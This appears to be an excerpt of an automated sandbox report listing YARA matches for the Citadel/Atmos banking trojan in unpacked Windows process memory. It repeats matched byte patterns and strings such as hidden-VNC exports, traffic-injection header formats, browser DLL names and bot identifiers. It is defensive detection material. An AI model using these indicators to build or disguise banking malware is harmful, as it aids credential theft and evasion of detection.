19.0.ApplicationFrameHost.exe.180000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 18 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 18 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 18 00
19.0.ApplicationFrameHost.exe.180000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
18.3.RuntimeBroker.exe.900000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
18.3.RuntimeBroker.exe.900000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
18.3.RuntimeBroker.exe.900000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
18.3.RuntimeBroker.exe.900000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 90 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 90 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 90 00
18.3.RuntimeBroker.exe.900000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
26.0.conhost.exe.30000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
26.0.conhost.exe.30000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
26.0.conhost.exe.30000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
26.0.conhost.exe.30000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 03 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 03 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 03 00
26.0.conhost.exe.30000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
8.3.StartMenuExperienceHost.exe.b50000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
8.3.StartMenuExperienceHost.exe.b50000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
8.3.StartMenuExperienceHost.exe.b50000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
8.3.StartMenuExperienceHost.exe.b50000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 B5 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 B5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 B5 00
8.3.StartMenuExperienceHost.exe.b50000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
19.0.ApplicationFrameHost.exe.180000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
19.0.ApplicationFrameHost.exe.180000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
19.0.ApplicationFrameHost.exe.180000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
19.0.ApplicationFrameHost.exe.180000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 18 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 18 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 18 00
19.0.ApplicationFrameHost.exe.180000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
21.0.RuntimeBroker.exe.190000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
21.0.RuntimeBroker.exe.190000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
21.0.RuntimeBroker.exe.190000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
21.0.RuntimeBroker.exe.190000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 19 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 19 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 19 00
21.0.RuntimeBroker.exe.190000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
28.0.RuntimeBroker.exe.810000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
28.0.RuntimeBroker.exe.810000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
28.0.RuntimeBroker.exe.810000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
28.0.RuntimeBroker.exe.810000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 81 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 81 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 81 00
28.0.RuntimeBroker.exe.810000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
17.3.RuntimeBroker.exe.3d0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
17.3.RuntimeBroker.exe.3d0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
17.3.RuntimeBroker.exe.3d0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
17.3.RuntimeBroker.exe.3d0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 3D 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 3D 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 3D 00
17.3.RuntimeBroker.exe.3d0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
23.0.UserOOBEBroker.exe.10000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
23.0.UserOOBEBroker.exe.10000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
23.0.UserOOBEBroker.exe.10000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
23.0.UserOOBEBroker.exe.10000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 01 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 01 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 01 00
23.0.UserOOBEBroker.exe.10000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
4.0.svchost.exe.9a0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
4.0.svchost.exe.9a0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
